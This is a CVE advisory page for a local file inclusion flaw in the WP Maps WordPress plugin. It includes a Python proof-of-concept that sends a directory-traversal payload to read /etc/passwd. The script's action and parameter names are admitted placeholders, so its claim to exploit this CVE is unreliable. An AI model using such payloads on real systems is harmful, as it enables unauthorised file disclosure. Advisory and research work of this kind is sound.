Security Vulnerability Report
中文
CVE-2026-6381 CVSS 7.5 HIGH

CVE-2026-6381

Published: 2026-05-18 07:16:13
Last Modified: 2026-05-18 17:05:46

Description

The WP Maps WordPress plugin before 4.9.3 does not properly sanitize a parameter before using it in a file path, allowing authenticated users to perform Local File Inclusion attacks.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Maps WordPress Plugin < 4.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-6381: WP Maps Plugin LFI # Target URL (example) target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker needs a valid authenticated session cookie (Low privilege required) cookies = { "wordpress_logged_in_abc123": "admin|..." } # The vulnerable parameter name is hypothetical, replace 'file_path_param' with actual parameter if known # The vulnerability allows including files via directory traversal payload = { "action": "vulnerable_action_name", "file_path_param": "../../../etc/passwd" } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200 and "root:" in response.text: print("[+] Vulnerability confirmed! /etc/passwd leaked.") else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6381", "sourceIdentifier": "[email protected]", "published": "2026-05-18T07:16:12.710", "lastModified": "2026-05-18T17:05:46.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Maps WordPress plugin before 4.9.3 does not properly sanitize a parameter before using it in a file path, allowing authenticated users to perform Local File Inclusion attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://wpscan.com/vulnerability/18b36672-58d7-44fa-b653-b728e9ef257a/", "source": "[email protected]"}]}}